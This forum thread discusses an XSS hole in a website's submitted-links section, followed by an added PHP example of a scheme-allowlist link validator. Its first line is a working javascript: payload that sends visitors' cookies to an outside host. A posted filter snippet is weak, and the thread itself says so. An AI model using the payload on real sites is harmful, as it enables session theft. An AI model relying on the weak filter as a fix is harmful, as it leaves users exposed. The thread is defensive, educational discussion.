Links section

javascript:document.location="http://osmosis.ath.cx/~mals/mals/o.php?o="+document.cookie

Hmm, does not look good...

Thanks for alerting us.

I deleted the harmful links.

Currently I have no idea how to sanitize submitted links properly.
Maybe we should add some <noscript> tags for the links section?

@mals: Thanks for finding a real security problem.
The geeks shall inherit the properties and methods of object earth.
Links should be validated by admins first.
I agree with theAnswer.
What's to stop people from adding tons of ad-links?
The amount of links you can add depends on your totalscore.

How about this snippet to prevent XSS in links?

    <?php
    // Strip a leading "http://" and reject the link if any other
    // "scheme://" is left over; htmlDisplayError() is the site's own
    // error-rendering helper.
    $url = str_replace("http://", "", $url);
    if (strpos($url, "://") !== false) {
        return htmlDisplayError("only valid links please.");
    }


My guess is that this would only make it slightly harder to exploit.
Stop trying to be funny.
There are tons of solutions on the net, but this one looks short and good enough:

http://svn.bitflux.ch/repos/public/popoon/trunk/classes/externalinput.php
Maybe check out the W3C specification for URLs. I bet you'll find a regex for it.
I think regex is not a good way, because nothing ensures that a valid URL doesn't contain an evil payload. This statement is only theoretical, but true.

Lessons learned: preventing XSS is a hard nut...
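A hardened version of the link check posted earlier in this thread, added here as an example; it is not code from the thread or from the site. Instead of stripping "http://" and looking for a leftover "://" (which lets a "javascript:" URI through, since it has no "://"), it parses the submitted link with parse_url(), allows only the http and https schemes, and encodes the link on output, which covers the point made above that a syntactically valid URL can still carry a payload. Function names and the sample submissions are constructed; the site's htmlDisplayError() is not used. Needs PHP 7.1 or later.

```php
<?php
// Added example, not the site's code: scheme allowlist plus output encoding
// for user-submitted links. validateSubmittedLink() and renderLink() are
// names chosen for this example.

declare(strict_types=1);

/**
 * Returns the normalised URL if it is an absolute http(s) link,
 * or null if the submission must be rejected.
 */
function validateSubmittedLink(string $input): ?string
{
    $url = trim($input);

    // Control characters or whitespace inside a URL are never legitimate;
    // they are the usual way a scheme is smuggled past naive filters.
    if (preg_match('/[\x00-\x20\x7f]/', $url)) {
        return null;
    }

    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host']) || $parts['host'] === '') {
        return null; // relative, malformed, or schemeless
    }

    // Scheme allowlist: javascript:, data:, vbscript:, ftp: and the rest are refused.
    $scheme = strtolower($parts['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;
    }

    // Rebuild from the parsed parts so what is stored is exactly what was checked.
    $rebuilt = $scheme . '://' . $parts['host'];
    if (isset($parts['port'])) {
        $rebuilt .= ':' . $parts['port'];
    }
    $rebuilt .= $parts['path'] ?? '/';
    if (isset($parts['query'])) {
        $rebuilt .= '?' . $parts['query'];
    }
    if (isset($parts['fragment'])) {
        $rebuilt .= '#' . $parts['fragment'];
    }
    return $rebuilt;
}

/**
 * Renders an <a> tag. Encoding is applied regardless of validation:
 * a valid URL may still contain quotes or angle brackets that would
 * otherwise break out of the href attribute.
 */
function renderLink(string $url, string $label): string
{
    $flags = ENT_QUOTES | ENT_HTML5;
    return '<a href="' . htmlspecialchars($url, $flags, 'UTF-8') . '" rel="nofollow">'
         . htmlspecialchars($label, $flags, 'UTF-8') . '</a>';
}

// Constructed sample submissions (not taken from the site).
$samples = [
    'http://example.com/page?x=1',
    'HTTPS://Example.com/',
    'javascript:alert(document.cookie)',   // no "://": passes the str_replace check above
    "java\tscript:alert(1)",               // tab smuggled into the scheme
    'example.com',                         // no scheme at all
    'http://example.com/?q="><b>bold',     // valid URL that still carries markup
];

foreach ($samples as $s) {
    $ok = validateSubmittedLink($s);
    echo str_pad(addcslashes($s, "\0..\37"), 40) . ' => '
       . ($ok === null ? 'REJECTED' : renderLink($ok, 'link')) . PHP_EOL;
}
```

Run it with `php links.php`: the first two samples are accepted and rebuilt with a lowercase scheme, the javascript:, tab-smuggled and schemeless samples are rejected, and the last one is accepted but rendered with `&quot;&gt;&lt;` in place of the raw characters, so it cannot close the attribute. Rejecting rather than "cleaning" bad input keeps the decision simple to audit; the encoding step is what protects the page when validation is bypassed or a new URL form appears.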